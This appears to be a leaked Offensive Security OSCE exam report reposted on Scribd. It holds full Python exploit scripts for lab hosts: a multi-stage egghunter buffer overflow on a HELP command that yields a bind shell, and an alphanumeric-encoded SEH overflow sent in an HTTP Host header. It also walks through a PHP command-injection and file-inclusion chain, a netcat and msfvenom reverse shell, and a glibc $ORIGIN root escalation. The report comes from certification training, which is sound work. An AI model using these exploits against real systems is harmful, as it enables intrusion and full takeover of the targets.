Scribd
Upload
50 views53 pages

OSCE Exam Report

The Offensive Security OSCE Exam Documentation outlines the requirements and methodology for passing the Offensive Security Certified Expert exam. It includes detailed sections on vulnerability identification, proof of concept code, and steps taken for various IP addresses. The document serves as a comprehensive guide for students to demonstrate their technical knowledge and skills necessary for certification.

Uploaded by

losthit69
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
50 views53 pages

OSCE Exam Report

The Offensive Security OSCE Exam Documentation outlines the requirements and methodology for passing the Offensive Security Certified Expert exam. It includes detailed sections on vulnerability identification, proof of concept code, and steps taken for various IP addresses. The document serves as a comprehensive guide for students to demonstrate their technical knowledge and skills necessary for certification.

Uploaded by

losthit69
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 53

Offensive Security

OSCE Exam Documentation


v.1.0

©
All rights reserved to Offensive Security, 2016.

No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner,
including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any broadcast
for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior written
permission from Offensive-Security.

1|Page

https://t.me/certs_help
Table of Contents
1.0 Offensive-Security OSCE Exam Documentation............................................................................... 3

2.0 192.168.XX.200 .............................................................................................................................. 4

2.1 Proof.txt .............................................................................................................................................. 4

2.2 Vulnerable Command ......................................................................................................................... 4

2.3 Vulnerability Identification ................................................................................................................. 5

2.4 PoC Code ............................................................................................................................................. 5

2.5 Steps .................................................................................................................................................. 10

Fuzzing with Spike ................................................................................................................................... 10

Replicating the crash ............................................................................................................................... 11

Effecting the registers to .................................................................................................................... 12

EIP Overwrite to Call ESP Execution ................................................................................................... 13

Results and Locating area for payload ................................................................................................ 15

Combining Shellcode.......................................................................................................................... 18

Reconstructor and Create an Egg ....................................................................................................... 21

Final Stage ......................................................................................................................................... 22

3.0 192.168.XX.220 ............................................................................................................................ 25

3.1 Proof.txt ............................................................................................................................................ 25

3.2 Vulnerable Code ................................................................................................................................ 26

3.3 Privilege Escalation ........................................................................................................................... 26

3.4 PoC Code ........................................................................................................................................... 29

3.5 Screenshots ....................................................................................................................................... 29

3.6 Steps .................................................................................................................................................. 29

2|Page

https://t.me/certs_help
Privelege Escalation ........................................................................................................................... 35

4.0 192.168.XX.201(Did not complete) ............................................................................................... 36

4.1 Screenshot ........................................................................................................................................ 36

4.2 Steps .................................................................................................................................................. 36

5.0 192.168.XX.240 ............................................................................................................................ 37

5.1 PoC Code ........................................................................................................................................... 37

5.2 Screenshot ........................................................................................................................................ 39

5.3 Steps .................................................................................................................................................. 40

6.0 Additional Items Not Mentioned in the Report............................................................................. 52

1.0 Offensive-Security OSCE Exam Documentation


The Offensive Security OSCE exam documentation contains all efforts that were conducted in
order to pass the Offensive Security Certified Expert exam. This report will be graded from a
standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to
ensure that the student has the technical knowledge required to pass the qualifications for the
Offensive Security Certified Expert certification.

The student will be required to fill out this exam documentation fully and to include the
following sections:

• Methodology walkthrough and detailed outline of steps taken


• Each finding with included screenshots, walkthrough, sample code, and proof.txt if
applicable.
• Any additional items that were not included

3|Page

https://t.me/certs_help
2.0 192.168.XX.200
2.1 Proof.txt

Provide the contents of proof.txt:

2.2 Vulnerable Command

The HELP command was found to be exploitable on the server.

4|Page

https://t.me/certs_help
2.3 Vulnerability Identification

Provide the method and code used to find the vulnerability.

Created the following file help_cmd.spk

1. s_readline();
2. s_readline();
3. s_readline();
4. s_readline();
5. s_string("HELP");
6. s_string_variable("");
7. s_string("\r\n");
8. s_readline();

2.4 PoC Code

Provide the final proof of concept code used to gain access to the server.

1. #! /usr/bin/python
2.
3. import sys;
4. import socket, time, os
5.
6. # This sets up the egghunter and the beginning of the code execution.
7.
8. b1 = (
9. "\xdb\xcd\xbe\xab\xea\x3c\xe0\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
10. "\x56\x31\x73\x18\x03\x73\x18\x83\xc3\xaf\x08\xc9\x1c\x47\x45"
11. "\x32\xdd\x97\x36\xba\x38\xa6\x64\xd8\x49\x9a\xb8\xaa\x1c\x16"
12. "\x32\xfe\xb4\xad\x36"
13. )
14.
15. b2 = (

5|Page

https://t.me/certs_help
16. "\xd7\xbb\x06\xfc\x01\xf5\x97\x30\x8e\x59"
17. "\x5b\x52\x72\xa0\x8f\xb4\x4b\x6b\xc2\xb5\x8c\x96\x2c\xe7\x45"
18. "\xdc\x9e\x18\xe1\xa0\x22\x18\x25\xaf\x1a\x62\x40\x70\xee\xd8"
19. "\x4b\xa1\x5e\x56\x03\x59\xd5\x30\xb4\x58"
20. )
21.
22. b3 = (
23. "\x3a\x23\x88\x13\x37"
24. "\x90\x7a\xa2\x91\xe8\x83\x94\xdd\xa7\xbd\x18\xd0\xb6\xfa\x9f"
25. "\x0a\xcd\xf0\xe3\xb7\xd6\xc2\x9e\x63\x52\xd7\x39\xe0\xc4\x33"
26. "\xbb\x25\x92\xb0\xb7\x82\xd0\x9f\xdb\x15\x34\x94\xe0\x9e\xbb"
27. )
28.
29. b4 = (
30. "\x7b\x61\xe4\x9f\x5f\x29\xbf\xbe\xc6\x97\x6e\xbe\x19\x7f\xcf"
31. "\x1a\x51\x92\x04\x1c\x38\xfb\xe9\x13\xc3\xfb\x65\x23\xb0\xc9"
32. "\x2a\x9f\x5e\x62\xa3\x39\x98\x85\x9e\xfe\x36\x78\x20\xff\x1f"
33. "\xbf\x74\xaf\x37\x16"
34. )
35. b5= (
36. "\xf4\x24\xc8\x97\x21\xea\x98\x37\x99\x4b"
37. "\x49\xf8\x49\x24\x83\xf7\xb6\x54\xac\xdd\xc1\x52\x62\x05\x82"
38. "\x34\x87\xb9\x35\x99\x0e\x5f\x5f\x31\x47\xf7\xf7\xf3\xbc\xc0"
39. "\x60\x0b\x97\x7c\x39\x9b\xaf\x6a\xfd\xa4"
40. )
41.
42. b6=(
43. "\x2f\xb9\xae\x09\x87"
44. "\x2a\x24\x42\x1c\x4a\x3b\x4f\x34\x05\x04\x18\xce\x7b\xc7\xb8"
45. "\xcf\x51\xbf\x59\x5d\x3e\x3f\x17\x7e\xe9\x68\x70\xb0\xe0\xfc"
46. "\x6c\xeb\x5a\xe2\x6c\x6d\xa4\xa6\xaa\x4e\x2b\x27\x3e\xea\x0f"
47. )
48.
49. b7 = (
50. "\x37\x86\xf3\x0b\x63\x56\xa2\xc5\xdd\x10\x1c\xa4\xb7\xca\xf3"
51. "\x6e\x5f\x8a\x3f\xb1\x19\x93\x15\x47\xc5\x22\xc0\x1e\xfa\x8b"
52. "\x84\x96\x83\xf1\x34\x58\x5e\xb2\x45\x13\xc2\x93\xcd\xfa\x97"
53. "\xa1\x93\xfc\x42\xe5"
54. )
55.
56. b8 = (
57. "\xad\x7e\x66\x96\x49\x9e\x03\x93\x16\x18"
58. "\xf8\xe9\x07\xcd\xfe\x5e\x27\xc4\x90\x90"
59. )
60.
61. # Sends the buffer first, followed by the code and place into a loaction it will fit properly in.
62.
63. for cntr in range(1,6):
64. print "[*] Sending Buffer: "
65. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
66. s.connect(("192.168.26.200",4321))

6|Page

https://t.me/certs_help
67. print s.recv(1024)
68. buff = "HELP "
69. buff += "\x90" * 50
70. s.send(buff)
71. s.close()
72.
73. # Sends T00WT00W
74.
75. print "[*] Please Wait while packet is sent!: "
76. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
77. s.connect(("192.168.26.200",4321))
78. print s.recv(1024)
79. buff = "HELP "
80. buff += ("T00WT00W" + "\x90\x90"
81. # push code onto the stack
82. "\xB9\x00\x00\x00\x00\x83\xC7\x40\x8B\xC7"
83. "\x83\xC7\x24\x83\xC7\x24\x57\x83\xC1\x01\x83\xF9\x13\x7E\xF1\xEB\x23\x90\x90"
84. )
85. s.send(buff)
86. s.close()
87.
88. print "[*] Please Wait while packet is sent!: "
89. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
90. s.connect(("192.168.26.200",4321))
91. print s.recv(1024)
92. buff = "HELP "
93. buff += ( # jumps back and rewrites our code
94. "\x90\x83\xC4\x28\x83\xEC\x08\x83\xC0\x39\x83\xC0\x01\x83\xC0\x40\xBD\x06\x00\x00\x00\x90"
95. "\x90\xB9\x32\x00\x00\x00\x8B\xF8\x5E\xFC\xF3\xA4"
96. "\x83\xED\x01\x90\x83\xC0\x32\x83\xFD\x00\x7F\xE8\xEB\x18"
97. )
98. s.send(buff)
99. s.close()
100.
101. print "[*] Sending 1: "
102. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
103. s.connect(("192.168.26.200",4321))
104. print s.recv(1024)
105. buff = "HELP "
106. buff += b1
107. s.send(buff)
108. s.close()
109.
110. for cntr in range(1,5):
111. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
112. s.connect(("192.168.26.200",4321))
113. print s.recv(1024)
114. buff = "HELP "
115. buff += "\x90" * 50
116. s.send(buff)
117. s.close()

7|Page

https://t.me/certs_help
118.
119. print "[*] Sending 3: "
120. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
121. s.connect(("192.168.26.200",4321))
122. print s.recv(1024)
123. buff = "HELP "
124. buff += b8
125. s.send(buff)
126. s.close()
127.
128. print "[*] Sending 4: "
129. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
130. s.connect(("192.168.26.200",4321))
131. print s.recv(1024)
132. buff = "HELP "
133. buff += b7
134. s.send(buff)
135. s.close()
136.
137. print "[*] Sending 5: "
138. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
139. s.connect(("192.168.26.200",4321))
140. print s.recv(1024)
141. buff = "HELP "
142. buff += b6
143. s.send(buff)
144. s.close()
145.
146. print "[*] Sending 6: "
147. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
148. s.connect(("192.168.26.200",4321))
149. print s.recv(1024)
150. buff = "HELP "
151. buff += b5
152. s.send(buff)
153. s.close()
154.
155.
156. print "[*] Sending 7: "
157. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
158. s.connect(("192.168.26.200",4321))
159. print s.recv(1024)
160. buff = "HELP "
161. buff += b4
162. s.send(buff)
163. s.close()
164.
165. print "[*] Sending 8: "
166. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
167. s.connect(("192.168.26.200",4321))
168. print s.recv(1024)

8|Page

https://t.me/certs_help
169. buff = "HELP "
170. buff += b3
171. s.send(buff)
172. s.close()
173.
174. print "[*] Sending 9: "
175. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
176. s.connect(("192.168.26.200",4321))
177. print s.recv(1024)
178. buff = "HELP "
179. buff += b2
180. s.send(buff)
181. s.close()
182.
183. egg="\xFC\x8B\xF7\x81\xC7\x52\x01\x00\x00\x81\xC7\x68\x01\x00\x00\x57\x81\xC6\x88\x00\x00\x00\x3
3\xC9\xB1\x07\x51\x58\x33\xC9\xB1\x32\xF3\xA4\x81\xC6\x16\x00\x00\x00"
184. + "\xeb\x16"
185. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
186. s.connect(("192.168.26.200",4321))
187. print s.recv(1024)
188. buff = "HELP "
189. buff += egg
190. s.send(buff)
191. s.close()
192.
193. # Sets ESP to our egghunter
194. #7C82385D FFD4 CALL ESP
195.
196. egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
197. egghunter += "\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
198. buff = "HELP "
199. buff += "\x90" * 7 +"\x5d\x38\x82\x7c" + "\x90"
200. buff += egghunter
201. buff += "("
202.
203. # Sending the crash pushes ESP to the beginning of the egghunter
204.
205. print "[*] Sending crash and egghunter: "
206. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
207. s.connect(("192.168.26.200",4321))
208. print s.recv(1024)
209.
210. print "Sending: "
211. s.send(buff)
212. print s.recv(1024)
213. s.close()

9|Page

https://t.me/certs_help
2.5 Steps

Provide a detailed account of your methodology in creating the exploit. The steps taken should
be able to be easily followed and reproducible if necessary.

Fuzzing with Spike

On our test server 192.168.xx.201 open the “offsecsrv.exe” and attach the running program to
OllyDbg. From there opened up Wireshark in order to view the packets being sent over from
the spike file that was create. Once everything was set, was able to send spike using the
following command “generic_send_tcp 192.168.26.201 4321 help_cmd.spk 0 0”.

10 | P a g e

https://t.me/certs_help
Replicating the crash

Using the following python script to replicate the same crash that the “help_cmd.spk” file
provided. The crash displayed the application would crash if the symbol “(“ was the 11th byte.

1. #! /usr/bin/python
2. import sys;
3. import socket, time
4. import os
5.
6. for count in range(1,20):
7. print "[*] Sending packet: " + str(count)
8. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
9. s.connect(("192.168.26.201",4321))
10. print s.recv(1024)
11.

11 | P a g e

https://t.me/certs_help
12. buff = "HELP "
13. buff += "A"*count + "("
14. print "Sending: " + buff
15. s.send(buff)
16. print s.recv(1024)
17. s.close()

Effecting the registers to


Through numerous trial and error the following was determined about the registers:

EIP: 4 bytes were overwritten at 8 through 11


EBP: 7 bytes were overwritten 1-7
ESP: Pointed to a location in memory that can be written to.

12 | P a g e

https://t.me/certs_help
1. #!/usr/bin/python
2.
3. import sys;
4. import socket, time
5. import os
6.
7. print "[*] Sending packet: "
8. print "[*] Sending packet: "
9. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
10. s.connect(("192.168.26.201",4321))
11. print s.recv(1024)
12.
13. buff = "HELP "
14. buff += "A"*7 + "C"*4 + "\x90" + "B"*40
15. buff += "("
16. 24)
17. s.close()

EIP Overwrite to Call ESP Execution


Searching through memory in OllyDbg to locate the instruction “call esp”, which was eventually
found in the kernel32.dll at the address 7C82385D. Modified the script to add the newly

13 | P a g e

https://t.me/certs_help
discovered address. Going back into OllyDbg, placing the breakpoint at the discovered address
7C82385D

14 | P a g e

https://t.me/certs_help
Results and Locating area for payload
Analyzing that stack presents that the results the buffer will only hold 11 bytes. With a bit of
searching through memory, finally came to notice that the commands are being saved off in
another area of memory. Additionally, any subsquent “HELP” commands sent after each
connection is closed will be recorded in the same place of memory. To find this area an
egghunter will need to be implemented, also discovered through various tests that we can cause
the exeption to occur if the character “(“ was placed anywhere after the 11th position.

The following snippet of code was used to check the block of memory that I was able to write to.

15 | P a g e

https://t.me/certs_help
1. print "[*] Sending packet: "
2. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
3. s.connect(("192.168.26.201",4321))
4. print s.recv(1024)
5. buff = "HELP "
6. buff += "A" * 56
7. s.send(buff)
8. s.close()
9.
10. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
11. s.connect(("192.168.26.201",4321))
12. print s.recv(1024)
13. buff = "HELP "
14. buff += "B" * 60
15. s.send(buff)
16. s.close()
17.
18. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
19. s.connect(("192.168.26.201",4321))
20. print s.recv(1024)
21. buff = "HELP "
22. buff += "C" * 56
23. s.send(buff)
24. s.close()
25.
26. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
27. s.connect(("192.168.26.201",4321))
28. print s.recv(1024)
29. buff = "HELP "
30. buff += "D" * 56
31. s.send(buff)
32. s.close()
33.
34. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
35. s.connect(("192.168.26.201",4321))
36. print s.recv(1024)
37. buff = "HELP "
38. buff += "E" * 56
39. s.send(buff)
40. s.close()
41.
42. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
43. s.connect(("192.168.26.201",4321))
44. print s.recv(1024)
45. buff = "HELP "
46. buff += "F" * 56
47. s.send(buff)
48. s.close()
49.
50. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
51. s.connect(("192.168.26.201",4321))

16 | P a g e

https://t.me/certs_help
52. print s.recv(1024)
53. buff = "HELP "
54. buff += "A" * 7 +"\x5d\x38\x82\x7c" + "(" *2 + "C" *49
55. print "Sending: "
56. s.send(buff)
57. print s.recv(1024)
58. s.close()

17 | P a g e

https://t.me/certs_help
Combining Shellcode
Looking at everything needed a way to merge each chunks of code, do to such a task I decided
to break the code into portions of 50 bytes and noticed that there was approximately 604 bytes
that are available to write to. Some of the bytes had to be used to reconstruct the shellcode.

For this to be accomplished all the payloads from “A through J” will be sent, then the shellcode
to combine the payload and execute it. And, in order to locate this shellcode an egghunter will be
used.

The following snippet breaks the payload into 50 byte chunks, creates a buffer space after the
beginning of the payload to reconstruct the remainder of the payload.

18 | P a g e

https://t.me/certs_help
1. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
2. s.connect(("192.168.26.201",4321))
3. print s.recv(1024)
4. buff = "HELP "
5. buff += "B" * 50
6. s.send(buff)
7. s.close()
8. # Buffer space for rest of code
9. for cntr in range(1,5):
10. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
11. s.connect(("192.168.26.201",4321))
12. print s.recv(1024)
13. buff = "HELP "
14. buff += "\x90" * 50
15. s.send(buff)
16. s.close()
17.
18. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
19. s.connect(("192.168.26.201",4321))
20. print s.recv(1024)
21. buff = "HELP "
22. buff += "C" * 50
23. s.send(buff)
24. s.close()
25.
26. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
27. s.connect(("192.168.26.201",4321))
28. print s.recv(1024)
29. buff = "HELP "
30. buff += "D" * 50
31. s.send(buff)
32. s.close()
33.
34. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
35. s.connect(("192.168.26.201",4321))
36. print s.recv(1024)
37. buff = "HELP "
38. buff += "E" * 50
39. s.send(buff)
40. s.close()
41.
42. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
43. s.connect(("192.168.26.201",4321))
44. print s.recv(1024)
45. buff = "HELP "
46. buff += "F" * 50
47. s.send(buff)
48. s.close()
49.
50.
51. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

19 | P a g e

https://t.me/certs_help
52. s.connect(("192.168.26.201",4321))
53. print s.recv(1024)
54. buff = "HELP "
55. buff += "G" * 50
56. s.send(buff)
57. s.close()
58.
59. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
60. s.connect(("192.168.26.201",4321))
61. print s.recv(1024)
62. buff = "HELP "
63. buff += "H" * 50
64. s.send(buff)
65. s.close()
66.
67. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
68. s.connect(("192.168.26.201",4321))
69. print s.recv(1024)
70. buff = "HELP "
71. buff += "I" * 50
72. s.send(buff)
73. s.close()
74.
75. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
76. s.connect(("192.168.26.201",4321))
77. print s.recv(1024)
78. buff = "HELP "
79. buff += "J" * 50
80. s.send(buff)
81. s.close()

20 | P a g e

https://t.me/certs_help
Reconstructor and Create an Egg
In order to rebuild the payload, I used the assembly method “REP MOVS BYTE PTR
ES:[EDI],BYTE PTR DS:”

First write the payload, then will push the payload onto the stack, then use REP MOVS BYTE
PTR ES:[EDI],BYTE PTR DS: assembly command to rebuild the payload. Modify the script
with the following

1. egg="\xFC\x8B\xF7\x81\xC7\x52\x01\x00\x00\x81\xC7\x68\x01\x00\x00\x57\x81\xC6\x88\x00\x00\x00\
x33\xC9\xB1\x07\x51\x58\x33\xC9\xB1\x32\xF3\xA4\x81\xC6\x16\x00\x00\x00" + "\xeb\x16"
2. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
3. s.connect(("192.168.26.201",4321))
4. print s.recv(1024)
5. buff = "HELP "
6. buff += egg
7. s.send(buff)
8. s.close()
9.
10. # Set ESP to our egghunter code
11.
12. #7C82385D FFD4 CALL ESP
13. egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
14. egghunter += "\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
15. buff = "HELP "
16. buff += "\x90" * 7 +"\x5d\x38\x82\x7c" + "\x90"
17. buff += egghunter
18. buff += "("
19.
20. s.close()

21 | P a g e

https://t.me/certs_help
After executing the script, noticed that the payload was being assembled in reverse order, so to get it
working properly needed to send the first part of the payload followed by the reverse 8 part of the
payload.

Final Stage
Decided to use msfgenerate to create a windows/shell_bind_tcp payload on port 4444. Nevertheless,
after everything is reconstructed, came to notice that commands were being mangled within memory.
Stepping through the code taking note of all the bad characters in order to regenerate a working
payload.

22 | P a g e

https://t.me/certs_help
Once the exploit was successfully executed on test server 192.168.26.201, changed all the IP’s to
192.168.26.200. Re-ran the script and successfully got a bind shell on port 4444.

23 | P a g e

https://t.me/certs_help
24 | P a g e

https://t.me/certs_help
3.0 192.168.XX.220
3.1 Proof.txt

Provide the contents of proof.txt

25 | P a g e

https://t.me/certs_help
3.2 Vulnerable Code

There were two PHP file that contained vulnerable lines of code. One allowed command injection into a
file, the other presented a local file inclusion.

Command Injection-dologin.php
The command “$SESSION[$key]=$value” allows an attacker to store arbitrary PHP commands within a
session file, but the session file was only created in the attacker presented valid credentials.

Local File Inclusion-expense.php


The vulnerable code inside the expense.php file takes the cookie value of the field user, appends the
value of “txt” to it and looks for the existing file. If the file exists it will be displayed. Typically, this value
would be the name of the user.

3.3 Privilege Escalation

The privilege escalation method used to root on the server is called “GNU C library dynamic linker -
$ORIGIN expansion” by Tarvis Ormandy. The exploit can be located at the following link:
https://www.exploit-db.com/exploits/15274/

a. Created a directory in /tmp

b. Link the created directory to a suid binary, thus changing the definition of $ORIGIN.

26 | P a g e

https://t.me/certs_help
c. Open a file descriptor to the target binary, the descriptor should be accessible via /proc

d. Next remove directory that was previously created, the /proc link should still be present,
but will be marked deleted.

e. Replace the directory with a DSO, which makes $ORIGIN a valid target to dlopen()

i. The payload.c file was compiled on my local system and transferred over using
wget.

f. Check to see if the link is created

g. Lastly force the link in /proc to load $ORIGIN by means of LD_AUDIT

27 | P a g e

https://t.me/certs_help
3.4 PoC Code

Provide the final proof of concept code used to gain access to the server.

3.5 Screenshots

Provide a screenshot of the id command and the contents of proof.txt.

28 | P a g e

https://t.me/certs_help
3.6 Steps
1. Start Iceweasel, have the plugin Foxy Proxy installed and configured to localhost on port 8891.
Open BurpSuite and configure the port to 8891

2. Browse to the web application, you’ll be presented with a login page that, enter the credentials
provided (username: user01, password: offsec). Intercept the login request (dologin.php) and
modify the login_forgot_cookie:

a. Discovered by appending a double quote (“) and a semi-colon just after the 0 within the
login_forgot, this terminates the PHP command. Using this now I can inject my own PHP
commands by using:

“; <?php do something ?>;

b. To execute shell commands, I used PHP’s “shell_exec(‘shell command’)”. The PHP


“echo” command was used to display the output in the returning server response. This
type of shell is a non-interactive shell, so the shell command has to be a non-interactive
command. Once you have the shell command you want to execute, forward the page.
The below screenshot demonstrates the execution of ‘ls -la’ shell command.

30 | P a g e

https://t.me/certs_help
3. To complete the shell command and display the results; intercept the “expenses.php” request
and make the following modifications:

a. Take note of the PHPSESSID value.

b. Modify the user cookie value to perform a LFI. The file that will open will be the current
PHP session file. The log file is located in the /var/lib/php/session directory and using
the naming convention of sess_PHPSESSID. The below screenshot will demonstrate the
syntax used for the LFI.

c. Executing an “ls -la” showed the current directory which was set too read-only. Though,
the /tmp directory allowed world-writeable permissions.

i. NOTE: Sent the Intercepted packet to Repeater inside BurpSuite to execute


additional commands using the current cookie. Otherwise the browser need to
be closed and cookies cleared out to run PHP commands.

31 | P a g e

https://t.me/certs_help
4. Now knowing that that I could write to the /tmp directory.

a. Start the apache service on the localhost (“apachectl start”). Moved netcat to the
/var/www/html directory.

b. Uploaded netcat to the server using wget and saving it in the /tmp directory and giving
it executable permissions. While playing around trying to get an interactive shell using
the -e flag and ‘/bin/bash’ with netcat turned out unsuccessful.

32 | P a g e

https://t.me/certs_help
c. Knowing that it is running Linux decided to create an ELF binary file with “msfvenom”,
then repeated steps a thru b.

33 | P a g e

https://t.me/certs_help
5. Set-up a listener on port 443 using “metasploit multi/handler” and run the ELF file

34 | P a g e

https://t.me/certs_help
Privelege Escalation
6. Details are outlined in the section “3.3 Privilege Escalation” on how root level access was
obtained.

35 | P a g e

https://t.me/certs_help
4.0 192.168.XX.201(Did not complete)
4.1 Screenshot

Screenshot requirements are detailed in the control panel.

4.2 Steps

Provide a detailed account of your methodology. The steps taken should be able to be easily followed
and reproducible if necessary.

36 | P a g e

https://t.me/certs_help
5.0 192.168.XX.240
5.1 PoC Code

Provide the final proof of concept code used to gain access to the server.

• pwnd.py

1. #!/usr/bin/python
2. import sys;
3. import socket
4. import os
5.
6. bufSize = 4000
7. ip_address="192.168.26.240"
8. port=7510
9.
10. print "\n[*] Creating payload ... "
11.
12. #################
13. # Set up the crash #
14. # overwriting eax #
15. #################
16.
17. crash = "A"* 3377
18.
19. # Short Jump to a good spot in memory
20. crash += "\x4c\x4c\x77\x21"
21.
22. # Address of pop pop ret - 6d356c6e
23. crash += "\x6e\x6c\x35\x6d"
24.
25. # Maintain payload size
26. crash += "C" * 29
27.
28. # Egghunter
29. # Zero out EAX and PUSH ESP (stack pointer) onto EAX
30. egghunter = ("\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x54\x58")
31.
32. # Set ESP to the beginning of our encoded egghunter
33. # by subtracting values from EAX then moving back into ESP

37 | P a g e

https://t.me/certs_help
34. # This jumps 253 bytes forward so we have enough room to decode the egghunter
35. egghunter += ("\x2D\x66\x4D\x55\x55\x2D\x66\x4B\x55\x55\x2D\x6A\x50\x55\x55\x5
0\x5C")
36.
37. # Encoded egghunter
38.
39. egghunter += (
40. "\x25\x4A\x4D\x4E\x55"
41. "\x25\x35\x32\x31\x2A"
42. "\x2d\x59\x7f\x7f\x49"
43. "\x2d\x11\x10\x31\x10"
44. "\x2d\x1f\x71\x7e\x15"
45. "\x50"
46. "\x25\x4A\x4D\x4E\x55"
47. "\x25\x35\x32\x31\x2A"
48. "\x2d\x28\x7f\x7f\x7f"
49. "\x2d\x10\x23\x29\x10"
50. "\x2d\x10\x7f\x7e\x34"
51. "\x50"
52. "\x25\x4A\x4D\x4E\x55"
53. "\x25\x35\x32\x31\x2A"
54. "\x2d\x73\x6f\x6f\x73"
55. "\x2d\x10\x10\x10\x10"
56. "\x2d\x2d\x2a\x2a\x2c"
57. "\x50"
58. "\x25\x4A\x4D\x4E\x55"
59. "\x25\x35\x32\x31\x2A"
60. "\x2d\x4d\x7f\x7f\x1f"
61. "\x2d\x10\x1b\x11\x10"
62. "\x2d\x1a\x7f\x3d\x10"
63. "\x50"
64. "\x25\x4A\x4D\x4E\x55"
65. "\x25\x35\x32\x31\x2A"
66. "\x2d\x59\x5f\x65\x6f"
67. "\x2d\x11\x10\x10\x10"
68. "\x2d\x1f\x22\x26\x2b"
69. "\x50"
70. "\x25\x4A\x4D\x4E\x55"
71. "\x25\x35\x32\x31\x2A"
72. "\x2d\x7f\x71\x22\x5d"
73. "\x2d\x10\x10\x10\x10"
74. "\x2d\x71\x29\x10\x22"
75. "\x50"

38 | P a g e

https://t.me/certs_help
76. "\x25\x4A\x4D\x4E\x55"
77. "\x25\x35\x32\x31\x2A"
78. "\x2d\x23\x7f\x7f\x7f"
79. "\x2d\x10\x10\x10\x10"
80. "\x2d\x10\x70\x70\x70"
81. "\x50"
82. )
83.
84.
85. crash += egghunter + "A"*(360 - len(egghunter)) + ":7510"
86.
87. buff = "GET /topology/home HTTP/1.1\r\n"
88. buff += "Host: " + crash + "\r\n"
89. buff += "Content-Type: application/x-www-form-urlencoded\r\n"
90. buff += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0)\r\n\r\n"
91. buff += "Content-length: 1048580\r\n\r\n"
92. # buff += ("T00WT00W" + "C"* 24 + shell + "\xcc" * (1400 - len(shell)))
93.
94. print "[*] Sending evil HTTP request to NNMz, ph33r"
95. print "[*] Waiting for crash"
96. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
97. s.connect((ip_address,port))
98. s.send(buff)
99. s.close()

5.2 Screenshot

Screenshot requirements are detailed in the control panel.

39 | P a g e

https://t.me/certs_help
5.3 Steps

Provide a detailed account of your methodology in creating the exploit. The steps taken should be able
to be easily followed and reproducible if necessary.

